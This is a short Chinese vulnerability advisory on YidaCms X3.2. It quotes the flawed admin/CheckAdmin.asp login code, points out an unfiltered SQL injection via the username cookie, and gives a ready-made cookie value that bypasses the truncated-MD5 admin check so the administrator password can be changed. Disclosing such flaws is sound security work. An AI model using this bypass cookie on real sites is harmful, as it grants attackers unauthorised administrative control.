YidaCms_X3.2逻辑错误造成越权访问,可修改管理密码

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 因代码逻辑错误,可以构造语句绕过,直接修改管理员密码 ### 详细说明: 最新版的3.2下的 admin\CheckAdmin.asp ``` username = request.Cookies("username") password = request.Cookies("password") cookies_md5 = request.Cookies("cookies_md5") dim admin_name,admin_pass,admin_qx,admin_aqx set rs = server.createobject("adodb.recordset") sql="select * from shuaiweb_vipadministrator where username='"&username&"'" rs.open sql,dbok,1,1 admin_name = rs("username") admin_pass = rs("password") admin_qx = rs("wait_ader") admin_aqx = rs("wait_adyi") rs.Close set rs=nothing response.write sql if cookies_md5 <> left(MD5(username&password),10) then response.write "登录超时,请重新登录!" response.cookies("username") = "" response.cookies("password") = "" response.end end if ``` username没有过滤直接进入sql,也算一个注入了... 下面一段代码 if cookies_md5 <> left(MD5(username&password),10) then .... end if 可以构造语句绕过 Cookie:username=admin; password=aaaaa;cookies_md5=84d8e258de [<img src="https://images.seebug.org/upload/201407/0402071010fb8a242528856a975dad8a2164e7b8.png"...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息